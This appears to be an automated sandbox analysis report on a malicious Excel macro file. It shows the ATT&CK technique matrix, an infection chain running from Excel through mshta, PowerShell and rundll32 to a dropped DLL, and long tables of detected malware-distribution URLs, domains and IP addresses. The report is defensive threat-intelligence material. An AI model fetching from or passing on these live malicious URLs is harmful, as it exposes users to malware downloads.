                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium15
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts111
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration3
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS1
                            Query Registry                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer123
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script21
                            Masquerading                            		LSA Secrets21
                            Security Software Discovery                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                            Process Injection                            		DCSync2
                            Process Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Application Window Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadow1
                            Remote System Discovery                            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562386 Sample: NZW-010122 BNUV-280122.xlsm Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 42 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Found malware configuration 2->65 67 Antivirus detection for URL or domain 2->67 69 14 other signatures 2->69 15 EXCEL.EXE 7 10 2->15         started        signatures3 process4 file5 47 C:\Users\...\~$NZW-010122 BNUV-280122.xlsm, data 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 weezual.fr 213.186.33.4, 49169, 80 OVHFR France 23->57 59 mycloud.suplitecmo.com 51.81.152.36, 49170, 80 OVHFR United States 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\SysWOW64\...\pcrxj.oyh (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            No Antivirus matches

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\JooSee.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            16.2.rundll32.exe.320000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2890000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2d30000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2c60000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2ef0000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            9.2.rundll32.exe.2a0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2d00000.18.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2e50000.25.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.3050000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.9b0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2d60000.20.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2ba0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.950000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.24a0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.210000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2c30000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2e40000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2970000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.f30000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2470000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.3030000.29.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e10000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2dc0000.22.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.8d0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2cd0000.17.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2e70000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.3000000.28.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.3060000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.af0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.4c0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2e20000.24.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2780000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2fb0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.950000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.8e0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2fe0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.2d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.3d0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2520000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2e10000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.300000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2bd0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.880000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2d90000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2e0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.770000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.8b0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.810000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.980000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2df0000.23.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2860000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.840000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.29e0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2fe0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.710000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.300000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.900000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.2c00000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.2e80000.26.unpack100%AviraHEUR/AGEN.1145233Download File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE100%Avira URL Cloudphishing
                            http://ancyh.xyz100%Avira URL Cloudmalware
                            http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE100%Avira URL Cloudmalware
                            http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE100%Avira URL Cloudmalware
                            http://ocsp.entrust.net030%URL Reputationsafe
                            http://sep.dfwsolar.club/hzh3v/z100%Avira URL Cloudmalware
                            http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/100%Avira URL Cloudmalware
                            http://weezual.fr/ju9c/twEHJDCvNwGimD/100%Avira URL Cloudmalware
                            http://danahousecare.com/wp-cont100%Avira URL Cloudmalware
                            http://mycloud.s0%Avira URL Cloudsafe
                            http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE100%Avira URL Cloudmalware
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                            http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://91.240.118.172/cc/vv/fe.png100%Avira URL Cloudmalware
                            http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE100%Avira URL Cloudmalware
                            http://stancewheels.com/wp-admin0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.htmlfunction0%Avira URL Cloudsafe
                            http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/100%Avira URL Cloudphishing
                            http://stancewheels.com/wp-admin/bbL1MAzNvohHH/0%Avira URL Cloudsafe
                            https://www.belajarngaji.shop/wp0%Avira URL Cloudsafe
                            http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmlWinSta00%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.pngPE0%Avira URL Cloudsafe
                            http://firstfitschool.com/83wg6z100%Avira URL Cloudphishing
                            http://mycloud.suplitecmo.com/Fo0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.html#H100%Avira URL Cloudmalware
                            https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/100%Avira URL Cloudmalware
                            http://ancyh.xyz/assets/Pcxv1k5/100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.html(0%Avira URL Cloudsafe
                            http://ocsp.entrust.net0D0%URL Reputationsafe
                            http://91.240.118.172/cc/vv/fe.htmlmshta0%Avira URL Cloudsafe
                            http://ancyh.xyz/assets/Pcxv1k5/PE100%Avira URL Cloudmalware
                            http://weezual.fr/ju9c/twEHJDCvNwGimD/PE100%Avira URL Cloudmalware
                            https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmlT0%Avira URL Cloudsafe
                            https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE100%Avira URL Cloudmalware
                            http://mycloud.suplitecmo.com0%Avira URL Cloudsafe
                            http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE0%Avira URL Cloudsafe
                            http://weezual.fr0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.htmlB0%Avira URL Cloudsafe
                            http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/100%Avira URL Cloudmalware
                            http://sep.dfwso0%Avira URL Cloudsafe
                            http://91.240.118.1720%Avira URL Cloudsafe
                            https://160.16.102.168/0%Avira URL Cloudsafe
                            http://michaelcrompton.co.uk/wp-0%Avira URL Cloudsafe
                            http://www.protware.com0%URL Reputationsafe
                            https://160.16.102.168:80/AUhFYYAjKIJ0%Avira URL Cloudsafe
                            https://lambayeque.apiperu.net.p0%Avira URL Cloudsafe
                            http://weezual.f0%Avira URL Cloudsafe
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                            http://weezual.fr/ju9c/twEHJDCvN0%Avira URL Cloudsafe
                            https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE100%Avira URL Cloudmalware
                            http://michaelcrompton.co.uk/wp-admin/G/100%Avira URL Cloudmalware
                            http://michaelcrompton.co.uk/wp-admin/G/PE100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmly0%Avira URL Cloudsafe
                            http://chupahfashion.com/eh6bwxk100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.p0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.html100%Avira URL Cloudmalware
                            http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html0%Avira URL Cloudsafe
                            http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmli0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.htmlngs0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            mycloud.suplitecmo.com
                            		51.81.152.36
                            		truefalse
                              		unknown
                              weezual.fr
                              		213.186.33.4
                              		truefalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://weezual.fr/ju9c/twEHJDCvNwGimD/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.172/cc/vv/fe.pngtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.172/cc/vv/fe.htmltrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://hekmat20.com/wp-includes/7/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  https://hekmat20.com/wp-includespowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://ancyh.xyzpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://ocsp.entrust.net03rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://sep.dfwsolar.club/hzh3v/zpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://danahousecare.com/wp-contpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://mycloud.spowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.diginotar.nl/cps/pkioverheid0rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://91.240.11powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: safe
                                    		low
                                    http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://stancewheels.com/wp-adminpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://91.240.118.172/cc/vv/fe.htmlfunctionmshta.exe, 00000004.00000003.422944437.0000000002DFD000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    http://stancewheels.com/wp-admin/bbL1MAzNvohHH/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.belajarngaji.shop/wppowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.172/cc/vv/fe.htmlWinSta0mshta.exe, 00000004.00000002.437108931.0000000000330000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://91.240.118.172/cc/vv/fe.pngPEpowershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://firstfitschool.com/83wg6zpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    http://mycloud.suplitecmo.com/Fopowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://91.240.118.172/cc/vv/fe.html#Hmshta.exe, 00000004.00000003.436214904.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438128891.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420818085.000000000041D000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://ancyh.xyz/assets/Pcxv1k5/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.172/cc/vv/fe.html(mshta.exe, 00000004.00000003.436133193.00000000003EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420800489.00000000003EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437986864.00000000003EB000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ocsp.entrust.net0Drundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://91.240.118.172/cc/vv/fe.htmlmshtamshta.exe, 00000004.00000002.437108931.0000000000330000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ancyh.xyz/assets/Pcxv1k5/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://weezual.fr/ju9c/twEHJDCvNwGimD/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.172/cc/vv/fe.htmlTmshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.entrust.net/server1.crl0rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://mycloud.suplitecmo.compowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://weezual.frpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://91.240.118.172/cc/vv/fe.htmlBNZW-010122 BNUV-280122.xls.0.drtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://sep.dfwsopowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://91.240.118.172powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://160.16.102.168/rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://michaelcrompton.co.uk/wp-powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.protware.commshta.exe, 00000004.00000003.420721916.0000000003C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://160.16.102.168:80/AUhFYYAjKIJrundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://lambayeque.apiperu.net.ppowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://weezual.fpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://weezual.fr/ju9c/twEHJDCvNpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://michaelcrompton.co.uk/wp-admin/G/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://michaelcrompton.co.uk/wp-admin/G/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://91.240.118.172/cc/vv/fe.htmlymshta.exe, 00000004.00000003.420780191.00000000003B8000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://chupahfashion.com/eh6bwxkpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
